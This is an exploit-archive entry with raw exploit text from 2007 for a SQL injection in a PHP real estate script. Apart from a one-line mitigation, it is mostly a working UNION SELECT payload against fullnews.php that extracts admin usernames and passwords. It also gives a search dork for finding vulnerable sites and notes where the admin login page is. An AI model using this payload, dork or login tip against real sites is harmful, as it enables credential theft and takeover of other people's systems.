PHP Real Estate SQL Injection Vulnerability

vendor:

PHP Real Estate Script

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Real Estate Script

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

PHP Real Estate SQL Injection Vulnerability

The vulnerability allows an attacker to pull admin info from the database. The exploit uses UNION SELECT statement to retrieve the username and password from the admin table. The vulnerable page is fullnews.php and the payload is www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries in the code.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		          PHP Real Estate SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: "Browse with Interactive Map"


DESCRIPTION: 
pull admin info from database


EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*


NOTE/TIP: 
admin login is at /admin/


GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		          PHP Real Estate SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-14]